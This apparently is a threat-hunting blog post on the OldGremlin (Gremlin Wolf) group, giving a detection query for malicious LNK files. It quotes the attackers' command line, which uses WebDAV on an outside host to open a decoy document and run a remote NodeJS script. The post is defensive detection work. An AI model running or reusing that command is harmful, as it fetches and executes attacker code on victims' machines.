105. Hunting for Gremlin Wolf (OldGremlin)

Hello everyone! Let's look at another activity cluster - Gremlin Wolf (also known as OldGremlin). This is one of my favorite adversaries, and recently I spotted another campaign, so I decided to share some detection and hunting opportunities.

The adversary distributes malicious LNK files, for example, this one. It's used to get and open a decoy document from a remote server, as well as to get a NodeJS interpreter to run a malicious JS-script:

cmd.exe /c start /B \\documents-drive.com\DavWWWRoot\DIADOC_Akt_sverki-04.25.docx & start /B \\documents-drive.com\DavWWWRoot\node.exe \\documents-drive.com\DavWWWRoot\index.txt

To hunt for such activity, I would focus on WebDAV and NodeJS interpreter, so the hunting query may look like this:

event_type: "processcreatewin"

AND

proc_file_name: "cmd.exe"

AND

cmdline: ("DavWWWRoot" AND "node.exe")

See you tomorrow!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

013. It Can Remove Rootkits. And Your EDR!